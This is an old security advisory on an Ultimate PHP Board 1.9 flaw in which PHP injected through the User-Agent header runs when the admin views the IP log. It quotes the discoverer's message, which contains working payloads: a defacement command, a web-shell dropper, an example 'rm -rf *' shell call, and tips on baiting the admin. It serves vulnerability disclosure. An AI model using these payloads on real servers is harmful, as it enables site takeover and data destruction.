Ultimate PHP Board Input Validation Flaw in 'iplog' File Lets Remote Users Cause Arbitrary PHP Code to Be Executed on the System
|
|
SecurityTracker Alert ID: 1006841
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 24 2003
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: Freedom 0f Knowledge Project
|
Version(s): 1.9
|
Description: A vulnerability was reported in Ultimate PHP Board (UPB). A remote user can cause arbitrary PHP code to be executed on the system by the UPB administrator.
F0KP reported a that a remote user can cause PHP code to be logged by the system and then can cause the code to be executed by the
UPB administrator. According to the report, the application will log the contents of the user-supplied HTTP_USER_AGENT field to
the 'iplog' text file in the 'db' directory. If the remote user inserts PHP code into the user agent field, and then the administrator
views the log file with the 'admin_iplog.php' script, the inserted PHP code will be executed on the target server.
A demonstration
exploit transcript is provided:
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent:
<? phpinfo(); ?>
Some additional demonstration exploit commands are provided in the Source Message.
|
Impact: A remote user can cause arbitrary PHP code to be written to a log file so that, when the administrator views the log file, the arbitrary code will be executed on the target system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.myupb.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "euronymous" <just-a-user@yandex.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 24 May 2003 18:21:37 +0400 (MSD)
From: "euronymous" <just-a-user@yandex.ru>
Subject: UPB: Discussion Board/Web-Site Takeover
|
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: UPB: Discussion Board/Web-Site Takeover
product: Ultimate PHP Board v1.9 [ latest ]
vendor: www.myupb.com
risk: high
date: 05/24/2k3
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
http://f0kp.iplus.ru/bz/024.ru.txt
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
there is serious vuln, that allow to attacker execute random php
code. the UPB logs some visitor info [ such as REMOTE_ADDR and
HTTP_USER_AGENT ] in text file under `db' directory named `iplog'.
then in admin panel board admin can to call admin_iplog.php, that
just include `iplog'. Thats 0k, but..
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>
when admin call the admin_iplog.php your php code will executed.
examples for kodsweb skids:
1. <? system( "echo \'hacked\' > ../index.html" ); ?>
will deface forum main page
2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>
will create tcsh.php in wwwroot with httpd privileges.
then you just go to http://hostname/tcsh.php?cmd=rm -rf *
after inject code through User-Agent field you have wait for admin see
the admin_iplog.php. how to make admin see the iplog?? its quite easy
== just annoy the admin, use the swearing in board messages, etc.
bonus
-----
in http://www.securityfocus.com/archive/1/302459 i just wrote
about some vuln in prior versions of UPB. and i wanna say, that
some described vulns else exists in 1.9!!
have a nice day >:E
shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================
|
|
